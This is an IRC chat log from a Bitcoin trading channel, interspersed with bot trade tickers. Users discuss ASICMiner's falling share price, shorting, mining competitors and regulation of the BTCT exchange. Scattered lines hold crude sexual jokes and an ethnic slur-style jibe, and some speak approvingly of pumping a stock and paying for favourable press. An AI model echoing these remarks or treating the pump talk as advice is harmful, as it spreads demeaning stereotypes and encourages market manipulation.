yeah. i calculated the payout manually. i'd suggest that the admin put in a js caclulator directly on the page.... Aug 27 17:53:53 bet * .99 * losing side * win weight/lose weight. Aug 27 17:54:04 for user-friendlyness Aug 27 17:54:05 http://thegenesisblock.com/cointerra-expects-to-deliver-2-phs-of-asics-in-december/ Aug 27 17:54:07 Cointerra Expects to Deliver 2 PH/s of ASICs in December - The Genesis Block Aug 27 17:54:23 fractal problem is the payout varies over time. Aug 27 17:55:16 mircea_popescu: right. So, a big red sign that says 'expected payout if the bet were to close now' Aug 27 17:55:34 how about people just do their own math :) Aug 27 17:55:40 not the worst idea Aug 27 17:55:55 it's not like bitbet has the market wrapped up Aug 27 17:56:04 mircea_popescu: you'll lose idiots as customers Aug 27 17:56:07 mise well develop Aug 27 17:56:23 I'd certainly like a calculator. especially if you can tweak stuff (not sure how it would be interface-wise) Aug 27 17:56:49 so asicminer going to get smoked by bitfuru and cointerra? Aug 27 17:56:50 kakobrekla ^ Aug 27 17:57:05 when I see the weight isn't in my favor, I just lazily don't bet Aug 27 17:57:05 i also still wanna see a Top Bettors area Aug 27 17:57:12 VanCleef the main concern is that the 1BN diff bet by next year is about even odds atm Aug 27 17:57:28 just show the addies of the top 5 most right, most wrong, most earned, most lost Aug 27 17:57:30 fun stuff! Aug 27 17:57:31 ThickAsThieves wha'ts a mise ? Aug 27 17:57:38 might as well Aug 27 17:57:51 and actually statistics like that is something cool. Aug 27 17:57:51 it comes from Magic the Gathering speak ;) Aug 27 17:57:55 o ok Aug 27 17:58:05 TAT: if people use diff. addressses often won't be able correlate that well tho. Aug 27 17:58:07 kakobrekla how about a stats page ? :D Aug 27 17:58:13 fractal, so Aug 27 17:58:25 fractal yeah, but people might WANT to use the same addy just for that. and if they don't... well so fine then Aug 27 17:58:45 fair enough. Aug 27 17:58:57 btw, wheres the best place to short AM shares? Aug 27 17:59:07 the forums Aug 27 17:59:09 in the latest development of wow, eve 1Bitcoin members want me to sell them fractions of shares now ;/ Aug 27 17:59:15 and all i can think is wtf where's tat. Aug 27 17:59:23 hehehe Aug 27 17:59:37 ThickAsThieves: really? no exchanges let you short shares? Aug 27 17:59:45 mpex does, but it doesn't carry am. Aug 27 17:59:48 mpex does, but they dont list AM Aug 27 17:59:58 gha! got it in first for ONCE Aug 27 18:00:07 haha Aug 27 18:00:23 you distracted me of dreams of being the pied piper of Eve finance Aug 27 18:00:28 with* Aug 27 18:01:23 ;;ticker Aug 27 18:01:24 MtGox BTCUSD ticker | Best bid: 130.10000, Best ask: 130.11000, Bid-ask spread: 0.01000, Last trade: 130.10000, 24 hour volume: 51644.68525893, 24 hour low: 119.91611, 24 hour high: 133.00000, 24 hour vwap: 126.77728 Aug 27 18:01:27 ;;nethash Aug 27 18:01:28 534879.275708 Aug 27 18:01:30 ;;estimate Aug 27 18:01:30 Next difficulty estimate | 73800307.2257 based on data since last change | 74720631.4604 based on data for last three days Aug 27 18:01:38 ;;bcstats Aug 27 18:01:40 Current Blocks: 254503 | Current Difficulty: 6.5750060149084814E7 | Next Difficulty At Block: 256031 | Next Difficulty In: 1528 blocks | Next Difficulty In About: 1 week, 1 day, 19 hours, 58 minutes, and 36 seconds | Next Difficulty Estimate: 73800307.2257 | Estimated Percent Change: 12.24371 Aug 27 18:01:48 do you even play ? Aug 27 18:01:57 i bought it Aug 27 18:02:00 have not played Aug 27 18:02:07 lol 1st world problems Aug 27 18:02:11 how long ago did you buy it Aug 27 18:02:12 i go through gaming phases Aug 27 18:02:16 like 3 weeks? Aug 27 18:02:24 Ah Aug 27 18:02:27 it was a mega sale or whatevs Aug 27 18:02:33 Steam Summer Sale? Aug 27 18:02:36 yeah Aug 27 18:02:43 two weeks ago i got into a shouting match with AM bulls, they've been eerily silent since then..... Aug 27 18:02:45 Oh yeah I feel you on that. Aug 27 18:02:49 i dont game for months/years at a time Aug 27 18:02:55 then i slip back Aug 27 18:03:03 like addicts. Aug 27 18:03:04 i have guilt trips about it Aug 27 18:03:07 i think everyone left AM Aug 27 18:03:07 yep Aug 27 18:03:17 currently enjoying dota 2 Aug 27 18:03:21 too much Aug 27 18:03:42 I get back into CS every now and then Aug 27 18:03:48 never played Aug 27 18:03:55 yeah nice, i miss nade spamming office Aug 27 18:04:25 I was on a dev team for it some time ago, during the first set of betas. Haven't been able to leave it lol Aug 27 18:04:33 [BTCTC] [ASICMINER-PT] 1 @ 2.64 BTC [-] Aug 27 18:04:35 [BTCTC] [ASICMINER-PT] 1 @ 2.635 BTC [-] Aug 27 18:04:36 [BTCTC] [ASICMINER-PT] 1 @ 2.634 BTC [-] Aug 27 18:04:37 [BTCTC] [ASICMINER-PT] 1 @ 2.633 BTC [-] Aug 27 18:04:37 [BTCTC] [ASICMINER-PT] 4 @ 2.633 = 10.532 BTC [-] Aug 27 18:04:39 [BTCTC] [ASICMINER-PT] 1 @ 2.631 BTC [-] Aug 27 18:04:39 BTCT.co doesn't allow shorting right? but they have PUT options? Aug 27 18:04:40 [BTCTC] [ASICMINER-PT] 8 @ 2.631 = 21.048 BTC [-] Aug 27 18:04:41 [BTCTC] [ASICMINER-PT] 15 @ 2.63 = 39.45 BTC [-] Aug 27 18:04:42 [BTCTC] [ASICMINER-PT] 1 @ 2.628 BTC [-] Aug 27 18:04:43 [BTCTC] [ASICMINER-PT] 5 @ 2.627 = 13.135 BTC [-] Aug 27 18:04:44 [BTCTC] [ASICMINER-PT] 5 @ 2.625 = 13.125 BTC [-] Aug 27 18:04:45 [BTCTC] [ASICMINER-PT] 1 @ 2.62 BTC [-] Aug 27 18:04:46 [BTCTC] [ASICMINER-PT] 3 @ 2.618 = 7.854 BTC [-] Aug 27 18:04:46 correct Aug 27 18:04:47 [BTCTC] [ASICMINER-PT] 4 @ 2.617 = 10.468 BTC [-] Aug 27 18:04:47 tanking time Aug 27 18:04:48 [BTCTC] [ASICMINER-PT] 1 @ 2.615 BTC [-] Aug 27 18:04:56 [BTCTC] [ASICMINER-PT] 1 @ 2.606 BTC [-] Aug 27 18:04:59 [BTCTC] [ASICMINER-PT] 5 @ 2.605 = 13.025 BTC [-] Aug 27 18:05:00 [BTCTC] [ASICMINER-PT] 2 @ 2.604 = 5.208 BTC [-] Aug 27 18:05:01 [BTCTC] [ASICMINER-PT] 1 @ 2.603 BTC [-] Aug 27 18:05:03 [BTCTC] [ASICMINER-PT] 5 @ 2.603 = 13.015 BTC [-] Aug 27 18:05:04 [BTCTC] [ASICMINER-PT] 5 @ 2.602 = 13.01 BTC [-] Aug 27 18:05:05 [BTCTC] [ASICMINER-PT] 20 @ 2.602 = 52.04 BTC [-] Aug 27 18:05:06 [BTCTC] [ASICMINER-PT] 1 @ 2.601 BTC [-] Aug 27 18:05:07 [BTCTC] [ASICMINER-PT] 1 @ 2.601 BTC [-] Aug 27 18:05:08 [BTCTC] [ASICMINER-PT] 1 @ 2.601 BTC [-] Aug 27 18:05:08 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [-] Aug 27 18:05:09 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [-] Aug 27 18:05:11 [BTCTC] [ASICMINER-PT] 1 @ 2.595 BTC [-] Aug 27 18:05:19 maybe this bot should throttle trades ? once every 5 sec? Aug 27 18:05:19 [BTCTC] [ASICMINER-PT] 1 @ 2.595 BTC [-] Aug 27 18:05:20 [BTCTC] [ASICMINER-PT] 1 @ 2.592 BTC [-] Aug 27 18:05:21 [BTCTC] [ASICMINER-PT] 1 @ 2.592 BTC [-] Aug 27 18:05:22 keep going! Aug 27 18:05:23 [BTCTC] [ASICMINER-PT] 1 @ 2.589 BTC [-] Aug 27 18:05:24 [BTCTC] [ASICMINER-PT] 1 @ 2.588 BTC [-] Aug 27 18:05:25 [BTCTC] [ASICMINER-PT] 1 @ 2.582 BTC [-] Aug 27 18:05:26 [BTCTC] [ASICMINER-PT] 1 @ 2.581 BTC [-] Aug 27 18:05:26 weeeeeeee Aug 27 18:05:27 [BTCTC] [ASICMINER-PT] 1 @ 2.573 BTC [-] Aug 27 18:05:27 [BTCTC] [ASICMINER-PT] 3 @ 2.572 = 7.716 BTC [-] Aug 27 18:05:28 [BTCTC] [ASICMINER-PT] 7 @ 2.571 = 17.997 BTC [-] Aug 27 18:05:29 [BTCTC] [ASICMINER-PT] 1 @ 2.57 BTC [-] Aug 27 18:05:30 ThickAsThieves you're short now ? Aug 27 18:05:30 where's your bid tat? Aug 27 18:05:30 [BTCTC] [ASICMINER-PT] 1 @ 2.56 BTC [-] Aug 27 18:05:31 [BTCTC] [ASICMINER-PT] 1 @ 2.56 BTC [-] Aug 27 18:05:32 [BTCTC] [ASICMINER-PT] 1 @ 2.54 BTC [-] Aug 27 18:05:33 [BTCTC] [ASICMINER-PT] 1 @ 2.536 BTC [-] Aug 27 18:05:34 [BTCTC] [ASICMINER-PT] 1 @ 2.536 BTC [-] Aug 27 18:05:35 [BTCTC] [ASICMINER-PT] 1 @ 2.535 BTC [-] Aug 27 18:05:36 [BTCTC] [ASICMINER-PT] 1 @ 2.534 BTC [-] Aug 27 18:05:36 [BTCTC] [ASICMINER-PT] 8 @ 2.534 = 20.272 BTC [-] Aug 27 18:05:37 [BTCTC] [ASICMINER-PT] 1 @ 2.533 BTC [-] Aug 27 18:05:38 [BTCTC] [ASICMINER-PT] 4 @ 2.521 = 10.084 BTC [-] Aug 27 18:05:39 [BTCTC] [ASICMINER-PT] 1 @ 2.511 BTC [-] Aug 27 18:05:40 [BTCTC] [ASICMINER-PT] 1 @ 2.511 BTC [-] Aug 27 18:05:40 Mines around 2.25 again Aug 27 18:05:41 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 27 18:05:42 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 27 18:05:42 i'm a buyer at the right price Aug 27 18:05:43 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 27 18:05:44 [BTCTC] [ASICMINER-PT] 1 @ 2.509 BTC [-] Aug 27 18:05:45 [BTCTC] [ASICMINER-PT] 1 @ 2.508 BTC [-] Aug 27 18:05:46 [BTCTC] [ASICMINER-PT] 1 @ 2.507 BTC [-] Aug 27 18:05:47 [BTCTC] [ASICMINER-PT] 1 @ 2.507 BTC [-] Aug 27 18:05:48 [BTCTC] [ASICMINER-PT] 2 @ 2.506 = 5.012 BTC [-] Aug 27 18:05:49 [BTCTC] [ASICMINER-PT] 1 @ 2.506 BTC [-] Aug 27 18:05:50 [BTCTC] [ASICMINER-PT] 6 @ 2.505 = 15.03 BTC [-] Aug 27 18:05:51 [BTCTC] [ASICMINER-PT] 2 @ 2.505 = 5.01 BTC [-] Aug 27 18:05:52 [BTCTC] [ASICMINER-PT] 1 @ 2.502 BTC [-] Aug 27 18:05:53 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] Aug 27 18:05:54 [BTCTC] [ASICMINER-PT] 8 @ 2.501 = 20.008 BTC [-] Aug 27 18:05:55 [BTCTC] [ASICMINER-PT] 3 @ 2.501 = 7.503 BTC [-] Aug 27 18:05:56 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 27 18:05:57 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [-] Aug 27 18:05:58 [BTCTC] [ASICMINER-PT] 4 @ 2.5 = 10 BTC [-] Aug 27 18:05:59 [BTCTC] [ASICMINER-PT] 20 @ 2.5 = 50 BTC [-] Aug 27 18:06:00 traditional "the jig is up" comment. Aug 27 18:06:00 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [-] Aug 27 18:06:04 epic Aug 27 18:06:12 AM was worth more then they'd ever be able to mine, and lemmings were still buying Aug 27 18:06:28 fractal reddinvestors. Aug 27 18:07:48 [BTCTC] [DMS.SELLING] 10 @ 0.0124 = 0.124 BTC [-] Aug 27 18:07:55 i suspect the market wants to labcoinize AM Aug 27 18:08:07 and have daily volatility Aug 27 18:08:39 [BTCTC] [DMS.SELLING] 50 @ 0.01233 = 0.6165 BTC [-] Aug 27 18:08:40 [BTCTC] [DMS.SELLING] 22 @ 0.01232 = 0.271 BTC [-] Aug 27 18:09:01 With the amount of mining companies entering the market in the next 12 months, AM won't hold more then 10%. i'm a buyer at 0.01 Aug 27 18:09:09 hehe Aug 27 18:09:19 only like 3 mining companies are even real Aug 27 18:09:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.02668 BTC [-] Aug 27 18:09:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.02666 = 0.08 BTC [-] Aug 27 18:09:47 [BTCTC] [DMS.MINING] 28 @ 0.003756 = 0.1052 BTC [-] Aug 27 18:10:21 Cointerra has the most brainpower behind them. KnC, Bitfury, Avalon, BFL, AM, are all likely 'real'. and then another 4-5 that are toss-ups Aug 27 18:10:36 [BTCTC] [ACTIVEMINING] 12 @ 0.005399 = 0.0648 BTC [-] Aug 27 18:10:42 AM, BitFury, Cointerra Aug 27 18:10:51 ABC Aug 27 18:11:11 with AM being the only one you can own Aug 27 18:11:16 Still, they will all be out of business in 2015 when Intel announces its 14nm chip. Which of course, the US gov't will run, and keep BTC in treasury. Aug 27 18:11:19 [BTCTC] [ACTIVEMINING] 12 @ 0.0054 = 0.0648 BTC [+] Aug 27 18:11:20 [BTCTC] [ACTIVEMINING] 41 @ 0.0054 = 0.2214 BTC [+] Aug 27 18:11:27 of course... Aug 27 18:11:34 Obviously. Aug 27 18:11:35 Naturally. Aug 27 18:11:37 As long as I can keep on making money by then Aug 27 18:11:52 [HAVELOCK] [XBOND] 5 @ 0.00118 = 0.0059 BTC [-] Aug 27 18:11:55 even assuming that, you act like people pay for bitcoin stocks based on 2015 Aug 27 18:12:22 most people can't even represent september 2013. Aug 27 18:12:42 TAT: as a trader in the real market, i do. ;) Aug 27 18:12:46 "two weeks" is this magical future time of myth and legend when people fly and live in submerged cities Aug 27 18:13:05 hehe Aug 27 18:13:08 [BTCTC] [LABCOIN] 5 @ 0.003501 = 0.0175 BTC [+] Aug 27 18:13:10 [BTCTC] [LABCOIN] 1695 @ 0.00348 = 5.8986 BTC [-] Aug 27 18:13:15 I can't wait! Aug 27 18:13:23 speaking of which, AMethyst is definitely real, just, real in its own way. Aug 27 18:13:31 [BTCTC] [TAT.ASICMINER] 6 @ 0.02666 = 0.16 BTC [-] Aug 27 18:13:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.02665 = 0.2665 BTC [-] Aug 27 18:13:34 [BTCTC] [TAT.ASICMINER] 20 @ 0.02664 = 0.5328 BTC [-] Aug 27 18:13:36 [BTCTC] [TAT.ASICMINER] 3 @ 0.02662 = 0.0799 BTC [-] Aug 27 18:13:37 [BTCTC] [TAT.ASICMINER] 39 @ 0.02661 = 1.0378 BTC [-] Aug 27 18:13:38 [BTCTC] [TAT.ASICMINER] 19 @ 0.0266 = 0.5054 BTC [-] Aug 27 18:13:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.0266 BTC [-] Aug 27 18:13:40 as in, really fake Aug 27 18:13:40 [BTCTC] [TAT.ASICMINER] 5 @ 0.0265 = 0.1325 BTC [-] Aug 27 18:13:41 [BTCTC] [TAT.ASICMINER] 89 @ 0.0265 = 2.3585 BTC [-] Aug 27 18:13:42 [BTCTC] [TAT.ASICMINER] 65 @ 0.0264 = 1.716 BTC [-] Aug 27 18:13:44 [BTCTC] [TAT.ASICMINER] 11 @ 0.0264 = 0.2904 BTC [-] Aug 27 18:13:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.0261 BTC [-] Aug 27 18:13:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.0261 = 0.0783 BTC [-] Aug 27 18:13:47 just too real Aug 27 18:13:48 [BTCTC] [TAT.ASICMINER] 5 @ 0.0261 = 0.1305 BTC [-] Aug 27 18:13:49 [BTCTC] [TAT.ASICMINER] 50 @ 0.0261 = 1.305 BTC [-] Aug 27 18:13:50 [BTCTC] [TAT.ASICMINER] 353 @ 0.02605 = 9.1957 BTC [-] Aug 27 18:13:51 [BTCTC] [TAT.ASICMINER] 43 @ 0.026 = 1.118 BTC [-] Aug 27 18:13:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.026 BTC [-] Aug 27 18:13:52 [BTCTC] [TAT.ASICMINER] 20 @ 0.026 = 0.52 BTC [-] Aug 27 18:13:53 [BTCTC] [TAT.ASICMINER] 5 @ 0.026 = 0.13 BTC [-] Aug 27 18:13:54 [BTCTC] [TAT.ASICMINER] 45 @ 0.026 = 1.17 BTC [-] Aug 27 18:14:01 it would be the only legit listing on BTCT I suppose Aug 27 18:14:10 if US Gov was smart, they'd create an alt-chain, announce USCoin as official legal tender (obviously after mining 50% and holding them in treasury. ) It would quickly surpass BTC as crypto of choice of the general public, and hit $100B market cap pretty fast. Once other governments catch on, it will be too late, and the US will hold 50% of the worlds cyrpto resserve currency. State-backed blockchains are a sure thing in 5,1 Aug 27 18:14:24 that's my idea Aug 27 18:14:27 you take that back Aug 27 18:14:47 eurocoin, americoin, etc Aug 27 18:15:05 except those wouldnt work either Aug 27 18:15:10 been saying it since i read satoshi's white-paper... i'm a futurist ;) unfortunately my event-horizon is usually too far off to be profitable though ;) Aug 27 18:15:16 because theyd never commit to limiting the supply Aug 27 18:15:28 fractal it wouldn't surpass btc. Aug 27 18:15:33 i'd short the shit out of it, for one. Aug 27 18:15:35 i'm just going to cash out and go make a movie or something Aug 27 18:16:30 ThickAsThieves: if they broke the rules, the free market would move out of USCoin into XYZCoin Aug 27 18:16:38 BTCT 30-day vol = 160.3k btc Aug 27 18:16:39 mircea_popescu: hahah Aug 27 18:17:14 [BTCTC] [ASICMINER-PT] 10 @ 2.514 = 25.14 BTC [+] Aug 27 18:17:16 [BTCTC] [ASICMINER-PT] 1 @ 2.513 BTC [-] Aug 27 18:17:17 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 27 18:17:18 [BTCTC] [ASICMINER-PT] 1 @ 2.508 BTC [-] Aug 27 18:17:20 [BTCTC] [ASICMINER-PT] 15 @ 2.505 = 37.575 BTC [-] Aug 27 18:17:21 [BTCTC] [ASICMINER-PT] 1 @ 2.503 BTC [-] Aug 27 18:17:36 sheeet tat Aug 27 18:18:13 ? Aug 27 18:18:18 oh, the vol Aug 27 18:19:04 so that's 640+btc in fees Aug 27 18:19:17 poor guy cant afford lawyers and KYC Aug 27 18:20:01 $64,000 a month is more then enough Aug 27 18:20:33 $83,200 if you give magicaltux a bj Aug 27 18:20:44 lol Aug 27 18:21:10 why not just hire 10 cheap lawyers from india? Aug 27 18:21:21 gotta be cheaper than 1 lawyer from america Aug 27 18:21:24 lol VanCleef Aug 27 18:21:36 is that how it works now Aug 27 18:21:37 incredibly high comedy right there. Aug 27 18:22:04 Santori pulls in partner rates Aug 27 18:22:06 I just pictured a legal call center - indian lawyers over skype Aug 27 18:22:08 must be worth it Aug 27 18:22:11 fractal a degree of magnitude more wasn't enough for mtgox once they stepped on the wrong lines. Aug 27 18:22:18 yes you pay indian lawyers to fully research and work the usa business law Aug 27 18:22:32 americans are notoriously lazy Aug 27 18:22:39 and bad at everything. Aug 27 18:22:48 BTCT might be ok for now as they dont touch any USD... same with just-dice. though i certainly wouldn't host them in the US Aug 27 18:22:50 fuck you we're just arrogant! Aug 27 18:22:55 lol Aug 27 18:22:57 ^^ Aug 27 18:22:59 Indians, however....they work for a living Aug 27 18:23:05 i know i can hire one full time business lawyer for 500$ a month Aug 27 18:23:14 red dot, not tomahawk Aug 27 18:23:16 just-dice uses amazon EC2 to host... im going to divest soon unless profit picks up... not worth the default risk of seizure. Aug 27 18:23:22 5g's a month for 10 of them isn't bad Aug 27 18:23:40 can they be women ? Aug 27 18:23:48 of course Aug 27 18:24:00 can they be dominant Aug 27 18:24:00 kind of gay being surrounded by 10 male lawyers Aug 27 18:24:07 a ghaddafi style retinue of female lawyer-strippers. Aug 27 18:24:11 10k a month ? Aug 27 18:24:21 [BTCTC] [BTC-TRADING-PT] 2 @ 1.06 = 2.12 BTC [-] Aug 27 18:24:21 dom hindi lawyers erection Aug 27 18:24:27 sorry i was talking pesos Aug 27 18:24:35 that's about 500 dollars a month Aug 27 18:24:43 is this a word association game? Aug 27 18:24:57 yes, it being on the internet. Aug 27 18:25:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.02599 BTC [-] Aug 27 18:25:23 everything is one-upsmanship online Aug 27 18:25:34 [BTCTC] [COGNITIVE] 2 @ 0.395 = 0.79 BTC [+] Aug 27 18:25:39 mircea_popescu MURICA about to regulate the shit out of the bitcoin Aug 27 18:25:53 mircea those gaddafi bodyguards were pretty useless in the end :P Aug 27 18:26:05 bitcoin about to regulate the shit out of murica Aug 27 18:26:09 VanCleef the guy didn't look particualrly unlaid... Aug 27 18:26:14 tru dat tat Aug 27 18:26:19 ahaha werd. Aug 27 18:26:25 hehe Aug 27 18:26:28 pinch dat tit & tru dat tat Aug 27 18:26:35 tit for me! Aug 27 18:26:36 guess they did do their job then Aug 27 18:26:40 tit for a me! Aug 27 18:26:41 tit for tat Aug 27 18:26:44 mircea_popescu: " will ship their 25 and 400 gigahash mining units before september 1" I take this to mean that if only 25GH units are shipped, or vice versa, the bet will end in NO, correct? Aug 27 18:26:53 ThickAsThieves you say that to womenz in barz don't you. Aug 27 18:26:59 hence 25 *AND* 400 gh units Aug 27 18:27:05 [HAVELOCK] [XBOND] 100 @ 0.001185 = 0.1185 BTC [+] Aug 27 18:27:11 no, but coincidentally my bar name is Carlos Aug 27 18:27:19 I'm Dirk Aug 27 18:27:20 fractal of those five there have to be at least one of each Aug 27 18:27:21 Weiner stole me identity Aug 27 18:27:27 my* Aug 27 18:27:31 mircea_popescu: ok thanks. Aug 27 18:27:32 Carlos Sanchez? Aug 27 18:27:36 i trust that guy Aug 27 18:27:39 Carlos Mantana Aug 27 18:27:43 Dirk Drizzler is my bar name Aug 27 18:27:52 i don't have a bar name. Aug 27 18:27:59 wtf, what is this, asia ? i only have a person name. Aug 27 18:28:06 Mantana Investments Aug 27 18:28:07 irllol Aug 27 18:28:16 lol Aug 27 18:28:23 oh well my bar name is what's on my business cards Aug 27 18:28:34 do you also have a caterpillar name ? Aug 27 18:28:38 [HAVELOCK] [CFIG] 1 @ 0.2 BTC [-] Aug 27 18:28:46 Dirk Drizzler, Ninja, and an email address Aug 27 18:28:49 yes, Mas Legsworth Aug 27 18:28:51 that's it Aug 27 18:29:02 OMG LABCOIN Aug 27 18:29:03 hey lets get serious Aug 27 18:29:07 why is asicminer dying? Aug 27 18:29:08 i just did Aug 27 18:29:15 BECAUSE OMG LABCOIN Aug 27 18:29:18 that's why Aug 27 18:29:19 k thx Aug 27 18:29:19 [BTCTC] [BASIC-MINING] 1 @ 0.2184 BTC [-] Aug 27 18:29:25 tjat's unserious. Aug 27 18:29:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.02599 BTC [-] Aug 27 18:29:34 Labcoin needs more news to prop it up. Aug 27 18:29:41 QUICK! To the NewsCave! Aug 27 18:29:45 [BTCTC] [TAT.ASICMINER] 6 @ 0.026 = 0.156 BTC [+] Aug 27 18:29:46 am is dieing because a bunch of people who think themsleves rich on paper tried to realise a pizza's worth of that wealth Aug 27 18:29:50 so go spread some news Aug 27 18:29:52 which drained the pool, causing a shift of mood. Aug 27 18:30:00 someone pay bitcoinmagazine to do an artcle on it Aug 27 18:30:02 asicminer can't keep up the dividends, not with bigger players either entering/pretending to enter Aug 27 18:30:09 their market sharte has been compromised Aug 27 18:30:12 *share Aug 27 18:30:16 market shart! Aug 27 18:30:18 oh jesus who snitched on it? Aug 27 18:30:22 [BTCTC] [BASIC-MINING] 1 @ 0.2236 BTC [+] Aug 27 18:30:27 market sharts sounds yummy Aug 27 18:30:44 :( Aug 27 18:30:58 pankkake analysis was most apt imo Aug 27 18:31:05 watch for falling asicminer prices unless they go 28nm Aug 27 18:31:21 [BTCTC] [BASIC-MINING] 1 @ 0.2236 BTC [+] Aug 27 18:31:26 AM price is the a factor of the last 6h of hashrate for AM farm and the last week's div amount Aug 27 18:31:44 [BTCTC] [BASIC-MINING] 1 @ 0.2236 BTC [+] Aug 27 18:32:00 that's prolly accurate. Aug 27 18:32:09 [MPEX] [S.MPOE] 2089 @ 0.00087466 = 1.8272 BTC [+] Aug 27 18:32:11 [MPEX] [S.MPOE] 5311 @ 0.00086949 = 4.6179 BTC [-] Aug 27 18:32:38 its okey we still have SANDSTORM Aug 27 18:32:45 [HAVELOCK] [AM100] 3 @ 0.0262 = 0.0786 BTC [+] Aug 27 18:32:49 to the moon alice Aug 27 18:32:59 [BTCTC] [HOSTED-MINING] 1 @ 0.00279 BTC [-] Aug 27 18:33:00 we being the 5 people that pumped it and had some left Aug 27 18:33:23 [BTCTC] [HOSTED-MINING] 26 @ 0.00279 = 0.0725 BTC [-] Aug 27 18:34:09 too bad I was sleeping at IPO time Aug 27 18:34:17 ×10 in a few hours, nice stuff Aug 27 18:34:24 x20 Aug 27 18:34:29 lol Aug 27 18:34:38 it was good ;) Aug 27 18:34:55 wait, what ?! Aug 27 18:34:58 best decimal hot swap so far Aug 27 18:35:12 it's also a good reminder to always set sell orders Aug 27 18:35:21 worked for XBOND too Aug 27 18:35:45 its true mircea Aug 27 18:36:38 [BTCTC] [BASIC-MINING] 1 @ 0.2231 BTC [-] Aug 27 18:36:45 AM will be a good buy at 0.01 Aug 27 18:36:47 what is this nonsense? https://bitcointalk.org/index.php?topic=125629.msg3019100#msg3019100 Aug 27 18:37:03 by the time it is .01 it will most certainly not be a good buy Aug 27 18:37:17 general public. Aug 27 18:37:53 ThickAsThieves: there are so many morons on the forums, its mostly noise except the technical development thread Aug 27 18:38:47 i learned long ago i take things to seriously Aug 27 18:38:50 too* Aug 27 18:38:59 i ams what ams Aug 27 18:39:01 i Aug 27 18:39:15 including being horrible at typing Aug 27 18:39:24 hah... seroiusly i wish the forums required a webcam to post, so you could see who was typing half these stupid posts Aug 27 18:39:47 you wish to see them? i prefer not to Aug 27 18:39:49 alot of naked people Aug 27 18:39:54 haha maybe you're right Aug 27 18:40:09 well… :) Aug 27 18:40:23 I'm in a bathrobe, that's okay Aug 27 18:40:25 I'm with jurov on this Aug 27 18:40:46 I only post on the forums while in my sex dungeon Aug 27 18:40:51 i prefer we just give them a video feedback of themselves Aug 27 18:40:52 so you know Aug 27 18:41:01 so they have to look at themselves when they say things Aug 27 18:41:09 Nothing wrong with the gov't regluating bitcoin exchnages that are based in the US. they can do what they want in their own country. don't like it? you can move elsewhere Aug 27 18:41:38 https://xkcd.com/481/ Aug 27 18:41:40 xkcd: Listen to Yourself Aug 27 18:42:09 best to move before china invades Aug 27 18:42:21 so where will be the next exchange? Somalia? Sealand? Aug 27 18:42:26 fractal: this is not the point. instead, tat's trying to dig burnside's head out of the sand Aug 27 18:42:44 [HAVELOCK] [XBOND] 820 @ 0.001185 = 0.9717 BTC [+] Aug 27 18:42:57 i have literally spoken with burnside on the phone on this very topic months ago Aug 27 18:43:07 my opinion is not new to him Aug 27 18:43:20 it's partly why i am disappointed Aug 27 18:44:58 ive actually spent hours offering perspectives, and the more sensible each is, the less likely he is to even acknowledge them Aug 27 18:45:15 like this whole voting for assets scheme he has Aug 27 18:45:35 meh, i'll just calm down Aug 27 18:45:42 breaaaaaaaaaaaathe! Aug 27 18:45:45 lol.. seems he's in same place as the people from the article i posted yest Aug 27 18:45:47 vent away Aug 27 18:46:54 peacock feathers are not legal protection Aug 27 18:47:01 [BTCTC] [ASICMINER-PT] 1 @ 2.639 BTC [+] Aug 27 18:47:02 [BTCTC] [ASICMINER-PT] 1 @ 2.64 BTC [+] Aug 27 18:47:03 [BTCTC] [ASICMINER-PT] 1 @ 2.647 BTC [+] Aug 27 18:47:07 ThickAsThieves: what are you trying to convince burnside of? (he owns BTCT right?) Aug 27 18:47:31 that he should own what he is and either see it through or give up Aug 27 18:48:07 and whats that? Aug 27 18:48:28 fractal: did you read that btctalk thread? Aug 27 18:48:39 he is a facilitator of grey market securities trading Aug 27 18:48:45 nah, too many text walls.... TL;DR; Aug 27 18:48:50 and also an issuer Aug 27 18:48:56 a whole othe rproblem.... Aug 27 18:48:58 last 2 pages or so suffice Aug 27 18:49:00 [HAVELOCK] [AM100] 7 @ 0.0263 = 0.1841 BTC [+] Aug 27 18:49:06 [BTCTC] [DMS.SELLING] 28 @ 0.01232 = 0.345 BTC [-] Aug 27 18:49:07 [BTCTC] [DMS.SELLING] 25 @ 0.01231 = 0.3078 BTC [-] Aug 27 18:49:09 [BTCTC] [DMS.SELLING] 144 @ 0.0123 = 1.7712 BTC [-] Aug 27 18:49:10 [BTCTC] [DMS.SELLING] 100 @ 0.01224 = 1.224 BTC [-] Aug 27 18:49:11 [BTCTC] [DMS.SELLING] 200 @ 0.01223 = 2.446 BTC [-] Aug 27 18:49:13 [BTCTC] [DMS.SELLING] 3 @ 0.01222 = 0.0367 BTC [-] Aug 27 18:49:42 [HAVELOCK] [AM100] 10 @ 0.0263 = 0.263 BTC [+] Aug 27 18:51:33 https://btct.co/security should show market cap on the table.... ugh, so many bitcoin sites make such bad UI/UX choices Aug 27 18:51:36 BTC-TC: BTC Trading Corp - Disclosure Aug 27 18:51:47 [BTCTC] [LABCOIN] 1 @ 0.003598 BTC [+] Aug 27 18:52:47 on the topic of burnside as operator and issuer, this post is fairly awesome: https://bitcointalk.org/index.php?topic=125629.msg2704053;topicseen#msg2704053 Aug 27 18:53:27 [HAVELOCK] [CFIG] 9 @ 0.2 = 1.8 BTC [-] Aug 27 18:55:49 [BTCTC] [LABCOIN] 30 @ 0.003598 = 0.1079 BTC [+] Aug 27 18:55:58 [BTCTC] [DMS.PURCHASE] 9 @ 0.0165 = 0.1485 BTC [+] Aug 27 18:57:02 